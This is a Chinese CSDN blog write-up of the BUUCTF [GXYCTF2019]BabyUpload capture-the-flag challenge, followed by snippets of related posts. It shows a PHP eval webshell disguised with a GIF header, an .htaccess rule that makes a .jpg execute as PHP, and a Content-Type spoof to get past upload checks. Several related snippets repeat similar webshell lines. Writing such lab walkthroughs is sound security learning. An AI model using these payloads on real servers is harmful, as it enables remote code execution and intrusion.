Buuctf-[GXYCTF2019]BabyUpload

最新推荐文章于 2024-04-24 19:08:47 发布
最新推荐文章于 2024-04-24 19:08:47 发布
阅读量238 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63563528/article/details/130395708
版权
文章描述了一次CTF挑战中如何尝试上传一句话木马绕过文件类型检查。作者首先尝试上传.php文件,然后转换为.jpg并利用.htaccess设置文件处理方式为PHP,最终成功执行代码并找到flag。
摘要由CSDN通过智能技术生成

  一周没做ctf了,今天看一道upload文件上传题:

 

 

我试图直接上传一句话木马的.php文件,如下:

 

php后缀的文件不行的话,我可以上传jpg:

 发现有文件头检查,使用下面这个一句话木马:

GIF89a
<script language='php'>eval($_POST['shell']);</script>

这会文件是已经上传成功了,但是jpg文件的一句话木马还不行,它无法执行,也就是现在我们还无法使用蚁剑连接,然而又因为:后缀名但凡包含ph的都被过滤了,这就意味着修改怎么修改后缀php都无法绕过,只能另寻他法,

下面试试上传一个 .htaccess 

文件名为 .htaccess ,内容为:

<FilesMatch "test.jpg">
       SetHandler  application/x-httpd-php
</FilesMatch>

还是被检测到文件类型不对了,可以试试更改 Content-Type 为 image/jpeg:

BP抓包:

 上传成功,我的文件test.jpg 现在就可以以php 文件执行,可以通过蚁剑连接:

 

在根目录下找到flag:

 

7ig3r
关注
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 749
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1946
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
upload类型题目总结
limenzzz的博客
04-20 1313
你传你🐎呢
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 625
BUUCTF的wp
BUUCTF-[GXYCTF2019]BabyUpload
m0_61361405的博客
10-19 496
首先,这是一道文件上传的题,题目给了GitHub的源码地址,那我就来进行代码审计。从代码中可以看出:1、网站会将上传的文件保存到相应的目录下2、网站会对后缀进行检测,不能有ph3、网站会检测上传的MIME文件类型首先这是个黑名单类型的文件上传,但是试了一下PHP、Phtml之类的都不行,所以把目光放在.htaccess和.user.ini之类的解析文件上。
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
第三十六题——[GXYCTF2019]BabyUpload
分享简单的安全技术
04-23 404
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,一个文件上传框,推测是使用一句话木马获取shell查找flag 第二步:上传伪装好的pass.png,发现错误 pass.png内容: GIF89a? <script language="php">eval($_REQUEST[pass])</script> 第三步:将png格式修改为jpg格式上传,成功 第四步:上传.htaccess文件,让pass.jpg文件以php格式解析,注
BUU实战笔记——[GXYCTF2019]BabyUpload 1
qq_51175992的博客
07-14 920
对于文件上传一般就是先找到可以上传的文件类型,然后看传上去的文件是否可以正常使用,若不行,再考虑配置文件的方法。
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2686
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
【复习】BUUCTF:[GXYCTF2019]BabyUpload -- 对.htaccess的 包含自己和解析图片马为php文件都可以的 。。也算easy
Zero_Adam的博客
04-19 1185
一、自己做: 只需要更改Content-Type就能够绕过了,但是好像对文件内容有过滤。 那么,不能有? ,看看PHP的版本,看看能够用html的script进行绕过 能成功,看看能否解析。
BUUCTF [web专项29][GXYCTF2019]BabyUpload
yanglinchiji的博客
11-07 110
成功,再次上传 .htaccess 来修改后缀(吸取了上次文件上传题的经验,成功上传的结果没有index,不需要用.user.ini)发现后缀不能带ph,那么就猜测是需要上传木马图上去,在上传一些文件来修改上传目录的指定文件后缀为php来进行执行。上传成功,我们先到上传目录下的1.jpg下看看是否执行了。已经执行了,那么我们就需要蚁剑连上去即可。那就需要抓包修改上传类型来绕过检测了。进入后还是发现是个文件上传题。在根目录下即可获得flag。还是用以前总结出来的方法。
【web | CTF】BUUCTF [GXYCTF2019]BabyUpload1
weixin_46301214的博客
09-05 445
通常apache和nginx都包含有 .htaccess 配置文件,可以试试这个漏洞。后来发现问题在Content-Type里,只能上传 image/jpeg 类型。但是发现还是能识别到,那就说明有php的特征被识别到了。那就需要使用图片码,但没有文件包含漏洞,无法执行。所以就采用上传.htaccess配置文件来。就改用JavaScript变成php来执行。然后更改文件名为jpeg后缀,上传。某文件变成php来执行。
BUUCTF [GXYCTF2019]BabyUpload 1详解(.htaccess配置文件特性)
m0_73734159的博客
11-29 1682
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性。倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码。先截断数据包再把上传的111.jpg文件更名为.htaccess文件。右键Repeater。
【BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 781
1.本题知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
[GXYCTF2019]BabyUpload-BUUTF
最新发布
XiaoYeZhu_1314的博客
04-24 495
他过滤了<?,ph等。
BUUCTF——[GXYCTF2019]BabyUpload
m_de_g的博客
04-17 543
【代码】BUUCTF——[GXYCTF2019]BabyUpload
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值